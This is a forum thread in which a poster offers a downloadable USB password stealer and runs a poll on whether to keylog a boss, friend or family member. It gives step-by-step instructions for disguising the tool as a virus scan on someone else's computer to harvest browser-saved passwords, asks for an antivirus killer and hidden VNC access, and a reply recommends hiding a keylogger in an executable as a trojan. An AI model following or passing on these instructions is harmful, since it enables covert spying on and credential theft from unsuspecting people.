internet_pirate

who would you ....?  

8 members have voted

1. 1. who would you keylog?

• boss
    • friend
    • family
    • other

ok i was not the one that truly created this but i put it togeder somehow and it works. i been wanting to get a keylogger for a long time but they never were free and if so it would only give you crap well i found this tutorial of a pass sniffer (meaning they have to have their pass save in their browsers and what not to get it ) and i bet alot of ppl do so i wanted to share this wit every one for one small favor .... i need a AV killer so noting in the flash drive gets erase or prevent us from getting what we want other then that yall can share yalls ass of dont ask me about errors all i know so far is

must have AV off

and must remove files that get created after the scan before going to a different computer

to set it up for your self just unzip everything in to a flash drive and plug it in to some ones computer and when the opion window pops up click on run virus scan a cmd will pop up and and it will scan (youll problably have to press continue if your not admin) and just wait a cople of sec. and then pull it out and plug it on to your computer and just open the flash drive dont scan your self! and open the new txt. files and in them have their passwords from

IE

Google Chrome

Opera

Firefox

and other more

and all i ask for some one to help add a AV killer to make it work better and maybe quicky install a VNC and extract their IP that would be nice no ? lol

(sorry if its hard to read add all its my first post :P )

keylogger.rar

Edited by internet_pirate

Ok I will try this on a VM, just in case.

Why don't you just get something like the free version of Ardamax Keylogger, set it to run invisible with a self destruct timer and inject it in an .exe as a trojan? The program also takes screenshots and logs instant messanger data and can be run remotely and through FTP. I found it to pretty interesting.

Why don't you just get something like the free version of Ardamax Keylogger, set it to run invisible with a self destruct timer and inject it in an .exe as a trojan? The program also takes screenshots and logs instant messanger data and can be run remotely and through FTP. I found it to pretty interesting.

i have not hear of it thats why lol but is it like the VNC ? where you see what their really donwing not screenshots?